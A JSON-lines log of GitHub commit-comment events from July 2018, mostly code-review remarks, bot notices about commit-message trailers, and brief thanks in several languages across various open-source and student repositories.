{"id":"7937668588","type":"CommitCommentEvent","actor":{"login":"HideyaSwider"},"repo":{"name":"ImenBenA/Tasks"},"payload":{"comment":{"id":29641875,"position":13,"line":24,"path":"src/index.js","commit_id":"633b2a81d0105585de2c5371e3a0eeb6ea329fbe","created_at":"2018-07-09T13:34:59Z","updated_at":"2018-07-09T13:34:59Z","author_association":"COLLABORATOR","body":"You handleSubmit is handled very well.\r\nThe only thing I would change is destruction of the state:\r\n`let { list, value } = this.state`"}},"created_at":"2018-07-09T13:34:59Z"}
{"id":"7937676519","type":"CommitCommentEvent","actor":{"login":"gglee0127"},"repo":{"name":"weduls/algorithm"},"payload":{"comment":{"id":29641891,"position":38,"line":38,"path":"문자열 처리/팰린드롬인지 확인하기/gglee/Main.java","commit_id":"e285f2906caa481112ddc19c49b3782064ddf725","created_at":"2018-07-09T13:36:20Z","updated_at":"2018-07-09T13:36:20Z","author_association":"COLLABORATOR","body":"@weduls 반복문 내부에 기본 데이터 타입 변수를 계속 생성시에 어떤 문제나 특이사항이 있는지 조사하고 올릴게요."}},"created_at":"2018-07-09T13:36:20Z"}
{"id":"7937677170","type":"CommitCommentEvent","actor":{"login":"HideyaSwider"},"repo":{"name":"ImenBenA/Tasks"},"payload":{"comment":{"id":29641894,"position":19,"line":29,"path":"src/index.js","commit_id":"5c91cbb5e3a00b514282696676560e364da1a790","created_at":"2018-07-09T13:36:26Z","updated_at":"2018-07-09T13:36:26Z","author_association":"COLLABORATOR","body":"More clean up could be:\r\n```javascript\r\nhandleChange({ target: { value }}) {\r\n  this.setState({value});\r\n}\r\n```"}},"created_at":"2018-07-09T13:36:26Z"}
{"id":"7937677269","type":"CommitCommentEvent","actor":{"login":"MinGOODdev"},"repo":{"name":"parkyounghwan/Algorithm"},"payload":{"comment":{"id":29641895,"position":null,"line":null,"path":null,"commit_id":"3e5b1385bdde1624f66822997ff57b37623998c5","created_at":"2018-07-09T13:36:27Z","updated_at":"2018-07-09T13:36:27Z","author_association":"NONE","body":"\r\n아조씨 설탕은 Suger가 아니고 Sugar 에오"}},"created_at":"2018-07-09T13:36:27Z"}
{"id":"7937681842","type":"CommitCommentEvent","actor":{"login":"godo13405"},"repo":{"name":"godo13405/dragon-spellbook"},"payload":{"comment":{"id":29641898,"position":null,"line":null,"path":null,"commit_id":"2564b2abe708a427850c4789c73e01a8f42a5e88","created_at":"2018-07-09T13:37:12Z","updated_at":"2018-07-09T13:37:12Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/48c4c854-767b-47f7-b2ec-7f79e14cf35d?env_id=ibm%3Ayp%3Aeu-gb \"dragon-book\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/7ddab936-a781-49fa-99fc-742d790aea96?env_id=ibm%3Ayp%3Aeu-gb \"dragon-book\") deployed [dragon-spellbook](https://github.com/godo13405/dragon-spellbook/releases/tag/deploy-ibm-yp-eu-gb-UXCalibur-prod-20180709-133710 \"deploy-ibm-yp-eu-gb-UXCalibur-prod-20180709-133710\") to [prod](https://console.bluemix.net/apps/aaffb021-5482-4ff5-bc14-26c90db6686c?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:UXCalibur:prod\"), including this commit"}},"created_at":"2018-07-09T13:37:12Z"}
{"id":"7937685094","type":"CommitCommentEvent","actor":{"login":"GitCop"},"repo":{"name":"ipfs/go-ipfs"},"payload":{"comment":{"id":29641903,"position":null,"line":null,"path":null,"commit_id":"2c178d484621a6f3f31c940cfbf85ea7490b9cbd","created_at":"2018-07-09T13:37:44Z","updated_at":"2018-07-09T13:37:44Z","author_association":"NONE","body":"There were the following issues with your Pull Request\n\n  * A \"License\" and a \"Signed-off-by\" trailers are required. See [the guidelines about this](https://github.com/ipfs/community/blob/master/contribution-guidelines.md#a-license-and-a-signed-off-by-trailers-are-required)\n\nWe ask for a few features in the commit message for Open Source licensing hygiene and commit message clarity.\r\n`git commit --amend` can often help you quickly improve the commit message.\r\n[Guidelines](https://github.com/ipfs/community/blob/master/contribution-guidelines.md#commit-messages) and [a script](https://github.com/ipfs/community/blob/master/dev/hooks/setup_commit_msg_hook.sh) are available to help in the long run.\r\nYour feedback on GitCop is welcome on [this issue](https://github.com/ipfs/infrastructure/issues/23).\n\n---\nThis message was auto-generated by https://gitcop.com\n"}},"created_at":"2018-07-09T13:37:44Z"}
{"id":"7937690458","type":"CommitCommentEvent","actor":{"login":"collicott"},"repo":{"name":"collicott/beamtime_schedule"},"payload":{"comment":{"id":29641912,"position":80,"line":731,"path":"app/controllers/UsersController.php","commit_id":"62fcf66aa7f008d78736945601f3e28ccf1e0c09","created_at":"2018-07-09T13:38:40Z","updated_at":"2018-07-09T13:38:40Z","author_association":"OWNER","body":"return Redirect::back()->with('error', 'Retirement date empty, please set a date');\r\n"}},"created_at":"2018-07-09T13:38:40Z"}
{"id":"7937690619","type":"CommitCommentEvent","actor":{"login":"HideyaSwider"},"repo":{"name":"ImenBenA/Tasks"},"payload":{"comment":{"id":29641913,"position":13,"line":46,"path":"src/index.js","commit_id":"75b93dd176389ec4d8cd11eb2a72adffa162f6ad","created_at":"2018-07-09T13:38:42Z","updated_at":"2018-07-09T13:38:42Z","author_association":"COLLABORATOR","body":"I think a more straight forward way is to directly set the `list[previouslyActiveItem].active` to false and set `list[newActiveItem].true`. It's true that at this point your app is small and looping through the items is probably okay and won't eat up your memory. But, we're better than that. We should shoot for more!"}},"created_at":"2018-07-09T13:38:42Z"}
{"id":"7937692212","type":"CommitCommentEvent","actor":{"login":"DrPeterVanNostrand"},"repo":{"name":"poanetwork/hbbft"},"payload":{"comment":{"id":29641915,"position":75,"line":151,"path":"src/common_coin.rs","commit_id":"17ae0154e3ebca462fbc68c66c0d33d488bc70a0","created_at":"2018-07-09T13:38:58Z","updated_at":"2018-07-09T13:38:58Z","author_association":"CONTRIBUTOR","body":"Same comment as above, `.take()` vs `replace()`."}},"created_at":"2018-07-09T13:38:58Z"}
{"id":"7937692235","type":"CommitCommentEvent","actor":{"login":"GitCop"},"repo":{"name":"ipfs/go-ipfs"},"payload":{"comment":{"id":29641916,"position":null,"line":null,"path":null,"commit_id":"2f4166e144adc304746a26256671652ae0b3e93c","created_at":"2018-07-09T13:38:59Z","updated_at":"2018-07-09T13:38:59Z","author_association":"NONE","body":"There were the following issues with your Pull Request\n\n  * A \"License\" and a \"Signed-off-by\" trailers are required. See [the guidelines about this](https://github.com/ipfs/community/blob/master/contribution-guidelines.md#a-license-and-a-signed-off-by-trailers-are-required)\n\nWe ask for a few features in the commit message for Open Source licensing hygiene and commit message clarity.\r\n`git commit --amend` can often help you quickly improve the commit message.\r\n[Guidelines](https://github.com/ipfs/community/blob/master/contribution-guidelines.md#commit-messages) and [a script](https://github.com/ipfs/community/blob/master/dev/hooks/setup_commit_msg_hook.sh) are available to help in the long run.\r\nYour feedback on GitCop is welcome on [this issue](https://github.com/ipfs/infrastructure/issues/23).\n\n---\nThis message was auto-generated by https://gitcop.com\n"}},"created_at":"2018-07-09T13:38:59Z"}
{"id":"7937693480","type":"CommitCommentEvent","actor":{"login":"vkomenda"},"repo":{"name":"poanetwork/hbbft"},"payload":{"comment":{"id":29641918,"position":80,"line":198,"path":"src/broadcast.rs","commit_id":"17ae0154e3ebca462fbc68c66c0d33d488bc70a0","created_at":"2018-07-09T13:39:11Z","updated_at":"2018-07-09T13:39:11Z","author_association":"CONTRIBUTOR","body":"Sure, I'll replace it everywhere."}},"created_at":"2018-07-09T13:39:11Z"}
{"id":"7937694255","type":"CommitCommentEvent","actor":{"login":"laocheng123"},"repo":{"name":"laocheng123/sdvas"},"payload":{"comment":{"id":29641921,"position":null,"line":null,"path":null,"commit_id":"4166b6765693155f4f29c1c3188add9e4e208981","created_at":"2018-07-09T13:39:19Z","updated_at":"2018-07-09T13:39:19Z","author_association":"OWNER","body":"cczvacxv"}},"created_at":"2018-07-09T13:39:19Z"}
{"id":"7937696641","type":"CommitCommentEvent","actor":{"login":"DrPeterVanNostrand"},"repo":{"name":"poanetwork/hbbft"},"payload":{"comment":{"id":29641924,"position":75,"line":183,"path":"src/common_subset.rs","commit_id":"17ae0154e3ebca462fbc68c66c0d33d488bc70a0","created_at":"2018-07-09T13:39:43Z","updated_at":"2018-07-09T13:39:43Z","author_association":"CONTRIBUTOR","body":"Same comment as above, `.take()` vs `replace()`."}},"created_at":"2018-07-09T13:39:43Z"}
{"id":"7937697943","type":"CommitCommentEvent","actor":{"login":"HideyaSwider"},"repo":{"name":"ImenBenA/Tasks"},"payload":{"comment":{"id":29641927,"position":10,"line":55,"path":"src/index.js","commit_id":"54a3733dec87e63e274fa9e642031e24652045f7","created_at":"2018-07-09T13:39:57Z","updated_at":"2018-07-09T13:39:57Z","author_association":"COLLABORATOR","body":"The final version of removeItem is 💯 "}},"created_at":"2018-07-09T13:39:57Z"}
{"id":"7937698940","type":"CommitCommentEvent","actor":{"login":"kurtzmarc"},"repo":{"name":"linkedin/test-butler"},"payload":{"comment":{"id":29641931,"position":null,"line":null,"path":null,"commit_id":"9aa710c07df72e684d0163191ff43a3be4a6fe06","created_at":"2018-07-09T13:40:08Z","updated_at":"2018-07-09T13:40:08Z","author_association":"NONE","body":"Note that I forgot to rename the test method. `AlwaysFinishActivitiesChangerTest.alwaysLeavePassiveProviderEnabled()`, should probably be named something more appropriate like `changeAlwaysFinishActivitiesSetting()`."}},"created_at":"2018-07-09T13:40:08Z"}
{"id":"7937703666","type":"CommitCommentEvent","actor":{"login":"terrasea2"},"repo":{"name":"ubiquitypress/rua"},"payload":{"comment":{"id":29641941,"position":19,"line":19,"path":"src/core/migrations/0167_auto_20180628_1304.py","commit_id":"c94b0f81403805a6ee069069d9dee552b2c2338b","created_at":"2018-07-09T13:40:52Z","updated_at":"2018-07-09T13:40:52Z","author_association":"CONTRIBUTOR","body":"It must have been done on a local machine where the base dir is /rua"}},"created_at":"2018-07-09T13:40:52Z"}
{"id":"7937704120","type":"CommitCommentEvent","actor":{"login":"kostyrev"},"repo":{"name":"synhershko/elasticsearch-cloud-deploy"},"payload":{"comment":{"id":29641944,"position":23,"line":98,"path":"terraform-aws/variables.tf","commit_id":"205573d28c5a1db2af4ba6e649d3ebf0cfa63af5","created_at":"2018-07-09T13:40:56Z","updated_at":"2018-07-09T13:40:56Z","author_association":"CONTRIBUTOR","body":"and here you break backward compatibility"}},"created_at":"2018-07-09T13:40:56Z"}
{"id":"7937704869","type":"CommitCommentEvent","actor":{"login":"tomfoss100"},"repo":{"name":"11September/seoland"},"payload":{"comment":{"id":29641946,"position":null,"line":null,"path":null,"commit_id":"397e8978d519ffaac1dac15c58ed2d56207ce940","created_at":"2018-07-09T13:41:04Z","updated_at":"2018-07-09T13:41:04Z","author_association":"COLLABORATOR","body":"412px is normal view but when lower it beginging to draw white space in the right of page"}},"created_at":"2018-07-09T13:41:04Z"}
{"id":"7937705045","type":"CommitCommentEvent","actor":{"login":"DrPeterVanNostrand"},"repo":{"name":"poanetwork/hbbft"},"payload":{"comment":{"id":29641947,"position":113,"line":301,"path":"src/dynamic_honey_badger.rs","commit_id":"17ae0154e3ebca462fbc68c66c0d33d488bc70a0","created_at":"2018-07-09T13:41:06Z","updated_at":"2018-07-09T13:41:06Z","author_association":"CONTRIBUTOR","body":"Same comment as above, `.take()` vs `replace()`."}},"created_at":"2018-07-09T13:41:06Z"}
{"id":"7937707846","type":"CommitCommentEvent","actor":{"login":"opel2991980"},"repo":{"name":"manoharan-lab/holopy"},"payload":{"comment":{"id":29641949,"position":7,"line":30,"path":"docs/source/users/infer_tutorial.rst","commit_id":"4dd3e311af1b10beb37ad3d5910068ceae2963ea","created_at":"2018-07-09T13:41:33Z","updated_at":"2018-07-09T13:41:33Z","author_association":"NONE","body":"\r\n![1](https://user-images.githubusercontent.com/40609496/42453904-bdddf576-8353-11e8-9d5a-c79bad214224.jpg)\r\n"}},"created_at":"2018-07-09T13:41:33Z"}
{"id":"7937708304","type":"CommitCommentEvent","actor":{"login":"niazim3"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29641950,"position":null,"line":null,"path":null,"commit_id":"98c674cfd847983fa17c15c2c95110531b577d4a","created_at":"2018-07-09T13:41:37Z","updated_at":"2018-07-09T13:41:37Z","author_association":"COLLABORATOR","body":"Alright, so a Labels.hs file should be made in both the Data folder (for labels that are common to all examples) and for each of the Example subfolders."}},"created_at":"2018-07-09T13:41:37Z"}
{"id":"7937713043","type":"CommitCommentEvent","actor":{"login":"collicott"},"repo":{"name":"collicott/beamtime_schedule"},"payload":{"comment":{"id":29641961,"position":13,"line":541,"path":"app/controllers/UsersController.php","commit_id":"8f9e8cc91a844626bc5535ad6eae4ad57a904275","created_at":"2018-07-09T13:42:24Z","updated_at":"2018-07-09T13:42:24Z","author_association":"OWNER","body":"Cannn do\r\n"}},"created_at":"2018-07-09T13:42:24Z"}
{"id":"7937714021","type":"CommitCommentEvent","actor":{"login":"rcillo"},"repo":{"name":"zalando/nakadi"},"payload":{"comment":{"id":29641964,"position":26,"line":178,"path":"src/main/java/org/zalando/nakadi/validation/JsonSchemaEnrichment.java","commit_id":"7ab73d2309358778495a30321d864422a1bc4a68","created_at":"2018-07-09T13:42:34Z","updated_at":"2018-07-09T13:42:34Z","author_association":"MEMBER","body":"@v-stepanov maybe also add minimum length of 1."}},"created_at":"2018-07-09T13:42:34Z"}
{"id":"7937716075","type":"CommitCommentEvent","actor":{"login":"GitCop"},"repo":{"name":"ipfs/go-ipfs"},"payload":{"comment":{"id":29641969,"position":null,"line":null,"path":null,"commit_id":"e063af8a199614d56fc36b8e8ca6035738df9bee","created_at":"2018-07-09T13:42:55Z","updated_at":"2018-07-09T13:42:55Z","author_association":"NONE","body":"There were the following issues with your Pull Request\n\n  * A \"License\" and a \"Signed-off-by\" trailers are required. See [the guidelines about this](https://github.com/ipfs/community/blob/master/contribution-guidelines.md#a-license-and-a-signed-off-by-trailers-are-required)\n\nWe ask for a few features in the commit message for Open Source licensing hygiene and commit message clarity.\r\n`git commit --amend` can often help you quickly improve the commit message.\r\n[Guidelines](https://github.com/ipfs/community/blob/master/contribution-guidelines.md#commit-messages) and [a script](https://github.com/ipfs/community/blob/master/dev/hooks/setup_commit_msg_hook.sh) are available to help in the long run.\r\nYour feedback on GitCop is welcome on [this issue](https://github.com/ipfs/infrastructure/issues/23).\n\n---\nThis message was auto-generated by https://gitcop.com\n"}},"created_at":"2018-07-09T13:42:55Z"}
{"id":"7937717586","type":"CommitCommentEvent","actor":{"login":"ged-odoo"},"repo":{"name":"odoo-dev/odoo"},"payload":{"comment":{"id":29641974,"position":10,"line":196,"path":"addons/web/static/src/js/core/ajax.js","commit_id":"91fe5cb307c123f6dd1b888cb2ab77cac76bbeef","created_at":"2018-07-09T13:43:10Z","updated_at":"2018-07-09T13:43:10Z","author_association":"NONE","body":"add a note saying that this will resolve immediately if this is the second time this method is called"}},"created_at":"2018-07-09T13:43:10Z"}
{"id":"7937719979","type":"CommitCommentEvent","actor":{"login":"heckflosse"},"repo":{"name":"Beep6581/RawTherapee"},"payload":{"comment":{"id":29641980,"position":null,"line":null,"path":null,"commit_id":"eeebe587ba4a899a10972c23a8e630ffa012e5d7","created_at":"2018-07-09T13:43:34Z","updated_at":"2018-07-09T13:43:34Z","author_association":"COLLABORATOR","body":"@agriggio Alberto, while testing this stuff I detected that for images from same camera the orientation of the image has an influence on the size you use in histogram matching. For example images from my D700 in portrait orientation will be resized to 712x1070 while images in landscape orientation will be resized to 472x709 for the matching.\r\nIs that intentional?"}},"created_at":"2018-07-09T13:43:34Z"}
{"id":"7937720888","type":"CommitCommentEvent","actor":{"login":"HideyaSwider"},"repo":{"name":"ImenBenA/Tasks"},"payload":{"comment":{"id":29641982,"position":18,"line":68,"path":"src/index.js","commit_id":"eb5546be71d855155744ecd46a85aa61608da767","created_at":"2018-07-09T13:43:43Z","updated_at":"2018-07-09T13:43:43Z","author_association":"COLLABORATOR","body":"I'll get back to this later - I need to think about it more. But this is interesting."}},"created_at":"2018-07-09T13:43:43Z"}
{"id":"7937724048","type":"CommitCommentEvent","actor":{"login":"HideyaSwider"},"repo":{"name":"ImenBenA/Tasks"},"payload":{"comment":{"id":29641990,"position":88,"line":97,"path":"src/index.js","commit_id":"b6e9750b543063ddaebc9af55d873d22348bfe26","created_at":"2018-07-09T13:44:14Z","updated_at":"2018-07-09T13:44:14Z","author_association":"COLLABORATOR","body":"💯 "}},"created_at":"2018-07-09T13:44:14Z"}
{"id":"7937726587","type":"CommitCommentEvent","actor":{"login":"golankopi"},"repo":{"name":"NadavOs90/Cognigo-Pokemon"},"payload":{"comment":{"id":29641995,"position":8,"line":8,"path":"MyFlaskApp/pokemon.py","commit_id":"3a1330a2c06d8408d3f4b8e8fda337be7114148d","created_at":"2018-07-09T13:44:39Z","updated_at":"2018-07-09T13:44:39Z","author_association":"NONE","body":"this is redundent (and won't work on linux..)\r\ntake as a given that there is an elasticsearch instance on the server "}},"created_at":"2018-07-09T13:44:39Z"}
{"id":"7937733584","type":"CommitCommentEvent","actor":{"login":"HideyaSwider"},"repo":{"name":"ImenBenA/Tasks"},"payload":{"comment":{"id":29642008,"position":78,"line":91,"path":"src/index.js","commit_id":"b6e9750b543063ddaebc9af55d873d22348bfe26","created_at":"2018-07-09T13:45:47Z","updated_at":"2018-07-09T13:45:47Z","author_association":"COLLABORATOR","body":"you can deconstruct the item here by using\r\n```javascript\r\nlist.map( ({uuid, value, done, active}, index) => { /*use the variable uuid instead of item.uuid*/}\r\n```"}},"created_at":"2018-07-09T13:45:47Z"}
{"id":"7937735206","type":"CommitCommentEvent","actor":{"login":"HideyaSwider"},"repo":{"name":"ImenBenA/Tasks"},"payload":{"comment":{"id":29642009,"position":93,"line":102,"path":"src/index.js","commit_id":"b6e9750b543063ddaebc9af55d873d22348bfe26","created_at":"2018-07-09T13:46:03Z","updated_at":"2018-07-09T13:46:03Z","author_association":"COLLABORATOR","body":"💯 "}},"created_at":"2018-07-09T13:46:03Z"}
{"id":"7937736438","type":"CommitCommentEvent","actor":{"login":"halfak"},"repo":{"name":"wiki-ai/articlequality"},"payload":{"comment":{"id":29642011,"position":47,"line":170,"path":"Makefile","commit_id":"32337bd97ffa66a8e2876d214d73670c370b111f","created_at":"2018-07-09T13:46:15Z","updated_at":"2018-07-09T13:46:15Z","author_association":"MEMBER","body":"This doesn't seem to add up to 100%"}},"created_at":"2018-07-09T13:46:15Z"}
{"id":"7937739964","type":"CommitCommentEvent","actor":{"login":"golankopi"},"repo":{"name":"NadavOs90/Cognigo-Pokemon"},"payload":{"comment":{"id":29642017,"position":27,"line":27,"path":"MyFlaskApp/pokemon.py","commit_id":"3a1330a2c06d8408d3f4b8e8fda337be7114148d","created_at":"2018-07-09T13:46:49Z","updated_at":"2018-07-09T13:46:49Z","author_association":"NONE","body":"The validation usually happens in the API level. You are not the first to validate inputs in the API level:) \r\nfind a better way to do it in the **Flask level**"}},"created_at":"2018-07-09T13:46:49Z"}
{"id":"7937745631","type":"CommitCommentEvent","actor":{"login":"DrPeterVanNostrand"},"repo":{"name":"poanetwork/hbbft"},"payload":{"comment":{"id":29642021,"position":107,"line":210,"path":"src/honey_badger.rs","commit_id":"17ae0154e3ebca462fbc68c66c0d33d488bc70a0","created_at":"2018-07-09T13:47:46Z","updated_at":"2018-07-09T13:47:46Z","author_association":"CONTRIBUTOR","body":"Same comment as above, `.take()` vs `replace()`."}},"created_at":"2018-07-09T13:47:46Z"}
{"id":"7937746088","type":"CommitCommentEvent","actor":{"login":"102296"},"repo":{"name":"GloriahMunyao/project"},"payload":{"comment":{"id":29642023,"position":null,"line":null,"path":null,"commit_id":"dda1f33514e9d915ac6e4e6380acbda3ba061228","created_at":"2018-07-09T13:47:50Z","updated_at":"2018-07-09T13:47:50Z","author_association":"NONE","body":"\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n[project.zip](https://github.com/GloriahMunyao/project/files/2176398/project.zip)\r\n"}},"created_at":"2018-07-09T13:47:50Z"}
{"id":"7937747460","type":"CommitCommentEvent","actor":{"login":"102296"},"repo":{"name":"GloriahMunyao/project"},"payload":{"comment":{"id":29642026,"position":null,"line":null,"path":null,"commit_id":"dda1f33514e9d915ac6e4e6380acbda3ba061228","created_at":"2018-07-09T13:48:04Z","updated_at":"2018-07-09T13:48:04Z","author_association":"NONE","body":"My bit"}},"created_at":"2018-07-09T13:48:04Z"}
{"id":"7937748608","type":"CommitCommentEvent","actor":{"login":"rouazana"},"repo":{"name":"linagora/james-project"},"payload":{"comment":{"id":29642032,"position":5,"line":87,"path":"mailbox/tika/src/main/java/org/apache/james/mailbox/tika/TikaTextExtractor.java","commit_id":"fbc3a2e9eccfefb04fba5b56af380ff9fc85cfef","created_at":"2018-07-09T13:48:15Z","updated_at":"2018-07-09T13:48:15Z","author_association":"MEMBER","body":"maybe you can add a constructor in ParsedContent that takes an Optional so that you don't need this orElse()"}},"created_at":"2018-07-09T13:48:15Z"}
{"id":"7937749599","type":"CommitCommentEvent","actor":{"login":"HideyaSwider"},"repo":{"name":"ImenBenA/Tasks"},"payload":{"comment":{"id":29642036,"position":null,"line":null,"path":null,"commit_id":"75b93dd176389ec4d8cd11eb2a72adffa162f6ad","created_at":"2018-07-09T13:48:25Z","updated_at":"2018-07-09T13:48:25Z","author_association":"COLLABORATOR","body":"I think it might be time to put the TaskForm component in its own file, and also maybe rename it: `List`? You will need to import it in index.js and pass it to the render function instead of TaskForm."}},"created_at":"2018-07-09T13:48:25Z"}
{"id":"7937750186","type":"CommitCommentEvent","actor":{"login":"ged-odoo"},"repo":{"name":"odoo-dev/odoo"},"payload":{"comment":{"id":29642038,"position":null,"line":null,"path":null,"commit_id":"91fe5cb307c123f6dd1b888cb2ab77cac76bbeef","created_at":"2018-07-09T13:48:31Z","updated_at":"2018-07-09T13:48:31Z","author_association":"NONE","body":"ok"}},"created_at":"2018-07-09T13:48:31Z"}
{"id":"7937751213","type":"CommitCommentEvent","actor":{"login":"golankopi"},"repo":{"name":"NadavOs90/Cognigo-Pokemon"},"payload":{"comment":{"id":29642039,"position":57,"line":57,"path":"MyFlaskApp/pokemon.py","commit_id":"3a1330a2c06d8408d3f4b8e8fda337be7114148d","created_at":"2018-07-09T13:48:40Z","updated_at":"2018-07-09T13:48:40Z","author_association":"NONE","body":"1. why did you use that search type? \r\n2. \"Will return the Pokemon objects that one of their **TEXT** fields contains (as a prefix of a word) our query-string-argument\" - this will work on the numeric fields as well"}},"created_at":"2018-07-09T13:48:40Z"}
{"id":"7937755295","type":"CommitCommentEvent","actor":{"login":"glietzen"},"repo":{"name":"RalphWiley/BucketList"},"payload":{"comment":{"id":29642046,"position":null,"line":null,"path":null,"commit_id":"af6ec4b6e94754890576d0670038a1fa29020f96","created_at":"2018-07-09T13:49:21Z","updated_at":"2018-07-09T13:49:21Z","author_association":"COLLABORATOR","body":"This also clears the modal form fields when a bucket list item is submitted."}},"created_at":"2018-07-09T13:49:21Z"}
{"id":"7937756426","type":"CommitCommentEvent","actor":{"login":"nyaata"},"repo":{"name":"GloriahMunyao/project"},"payload":{"comment":{"id":29642047,"position":null,"line":null,"path":null,"commit_id":"dda1f33514e9d915ac6e4e6380acbda3ba061228","created_at":"2018-07-09T13:49:33Z","updated_at":"2018-07-09T13:49:33Z","author_association":"NONE","body":"[project.zip](https://github.com/GloriahMunyao/project/files/2176404/project.zip)\r\n"}},"created_at":"2018-07-09T13:49:33Z"}
{"id":"7937756877","type":"CommitCommentEvent","actor":{"login":"bilalwaseem"},"repo":{"name":"bilalwaseem/SP"},"payload":{"comment":{"id":29642048,"position":null,"line":null,"path":null,"commit_id":"d267af011b312707e3e753518a449baec7dd1caa","created_at":"2018-07-09T13:49:37Z","updated_at":"2018-07-09T13:49:37Z","author_association":"OWNER","body":"merging"}},"created_at":"2018-07-09T13:49:37Z"}
{"id":"7937757878","type":"CommitCommentEvent","actor":{"login":"nyaata"},"repo":{"name":"GloriahMunyao/project"},"payload":{"comment":{"id":29642053,"position":null,"line":null,"path":null,"commit_id":"dda1f33514e9d915ac6e4e6380acbda3ba061228","created_at":"2018-07-09T13:49:47Z","updated_at":"2018-07-09T13:49:47Z","author_association":"NONE","body":"Homepage"}},"created_at":"2018-07-09T13:49:47Z"}
{"id":"7937759965","type":"CommitCommentEvent","actor":{"login":"lizmat"},"repo":{"name":"perl6/doc"},"payload":{"comment":{"id":29642055,"position":null,"line":null,"path":null,"commit_id":"19099126574d1589b4ba13c6eda7067d92467fc9","created_at":"2018-07-09T13:50:09Z","updated_at":"2018-07-09T13:50:09Z","author_association":"MEMBER","body":"👍"}},"created_at":"2018-07-09T13:50:09Z"}
{"id":"7937767050","type":"CommitCommentEvent","actor":{"login":"kinjo-icolle"},"repo":{"name":"n18016/programming-term2"},"payload":{"comment":{"id":29642061,"position":null,"line":null,"path":null,"commit_id":"936d35a97388f4390c8f8f06ff247eca4a50ce96","created_at":"2018-07-09T13:51:18Z","updated_at":"2018-07-09T13:51:18Z","author_association":"NONE","body":"再提出ありがとうございます。\r\n\r\n焼鳥について：\r\nこれだと元値(100)がわからず、割引率(rate)も結局使われていないですね^^;\r\n講義の際に出題意図に沿ったコードを見せますので、参考にしてみてくださいね。"}},"created_at":"2018-07-09T13:51:18Z"}
{"id":"7937767729","type":"CommitCommentEvent","actor":{"login":"golankopi"},"repo":{"name":"NadavOs90/Cognigo-Pokemon"},"payload":{"comment":{"id":29642062,"position":25,"line":25,"path":"MyFlaskApp/app.py","commit_id":"3a1330a2c06d8408d3f4b8e8fda337be7114148d","created_at":"2018-07-09T13:51:25Z","updated_at":"2018-07-09T13:51:25Z","author_association":"NONE","body":"no need for HTML. this is a REST service. it should return textual data- and only relevant methods (no need for the GET or POST logic..) "}},"created_at":"2018-07-09T13:51:25Z"}
{"id":"7937770336","type":"CommitCommentEvent","actor":{"login":"HwyStudio"},"repo":{"name":"HwyStudio/test"},"payload":{"comment":{"id":29642073,"position":null,"line":null,"path":null,"commit_id":"7e3c2f91982dd2b706c6b1520bb639ae61075c0b","created_at":"2018-07-09T13:51:49Z","updated_at":"2018-07-09T13:51:49Z","author_association":"OWNER","body":"辅助程序"}},"created_at":"2018-07-09T13:51:49Z"}
{"id":"7937772232","type":"CommitCommentEvent","actor":{"login":"HwyStudio"},"repo":{"name":"HwyStudio/test"},"payload":{"comment":{"id":29642076,"position":null,"line":null,"path":null,"commit_id":"7e3c2f91982dd2b706c6b1520bb639ae61075c0b","created_at":"2018-07-09T13:52:08Z","updated_at":"2018-07-09T13:52:08Z","author_association":"OWNER","body":"辅助程序"}},"created_at":"2018-07-09T13:52:08Z"}
{"id":"7937781395","type":"CommitCommentEvent","actor":{"login":"nikidobos"},"repo":{"name":"green-fox-academy/Andras89"},"payload":{"comment":{"id":29642084,"position":null,"line":null,"path":null,"commit_id":"593852f16fd11d9e2023a08891ae40833505db4e","created_at":"2018-07-09T13:53:36Z","updated_at":"2018-07-09T13:53:36Z","author_association":"NONE","body":"loptam köszike :squirrel:"}},"created_at":"2018-07-09T13:53:36Z"}
{"id":"7937783950","type":"CommitCommentEvent","actor":{"login":"ivan-ristovic"},"repo":{"name":"ivan-ristovic/the-godfather"},"payload":{"comment":{"id":29642089,"position":null,"line":null,"path":null,"commit_id":"5214d4f49f1f67a2e26f4321451f884a726f829c","created_at":"2018-07-09T13:54:02Z","updated_at":"2018-07-09T13:54:02Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Listeners change channel topic wrong report](https://trello.com/c/Ym4XFk0Z/192-listeners-change-channel-topic-wrong-report)"}},"created_at":"2018-07-09T13:54:02Z"}
{"id":"7937788255","type":"CommitCommentEvent","actor":{"login":"SupagitRuarn"},"repo":{"name":"udacity/ud839_Miwok"},"payload":{"comment":{"id":29642105,"position":44,"line":48,"path":"app/src/main/java/com/example/android/miwok/NumbersActivity.java","commit_id":"4ffd4a73a8d4e44b4cf78a32f16b46c004ac28cc","created_at":"2018-07-09T13:54:45Z","updated_at":"2018-07-09T13:54:45Z","author_association":"NONE","body":"สุดยอด "}},"created_at":"2018-07-09T13:54:45Z"}
{"id":"7937797084","type":"CommitCommentEvent","actor":{"login":"mutoe"},"repo":{"name":"slimkit/plus-small-screen-client"},"payload":{"comment":{"id":29642119,"position":null,"line":null,"path":null,"commit_id":"149f205d7c7bdb0562d4d26087d30773a1155721","created_at":"2018-07-09T13:56:12Z","updated_at":"2018-07-09T13:56:12Z","author_association":"COLLABORATOR","body":"@medz  是的，我最近修复问题的时候有顺手重构一些代码，像api调用（/api/api.js vs /http.js），message弹框有两套，svg icon vs v-icon组件这些，我都在尝试取其精华的理念合并它们，自己也能增长不少见识。\r\n\r\n在这之前我也会纠结究竟哪套比较规范、比较合理，除开我在学校自学的时间，我也才做前端一年而已，可能会有不够好的地方，很感谢您向我解释了这么多，我会加油维护好这个仓库的。如果今后的时间您看到了我哪里做的不好或者有什么建议，还请不吝赐教！"}},"created_at":"2018-07-09T13:56:12Z"}
{"id":"7937799190","type":"CommitCommentEvent","actor":{"login":"ged-odoo"},"repo":{"name":"odoo-dev/odoo"},"payload":{"comment":{"id":29642125,"position":12,"line":55,"path":"doc/reference/views.rst","commit_id":"4eafe7027129c32d239813672beecc8aa934aee4","created_at":"2018-07-09T13:56:31Z","updated_at":"2018-07-09T13:56:31Z","author_association":"NONE","body":"why not a css key in the json returned by the controller? so we do not need to do this hack"}},"created_at":"2018-07-09T13:56:31Z"}
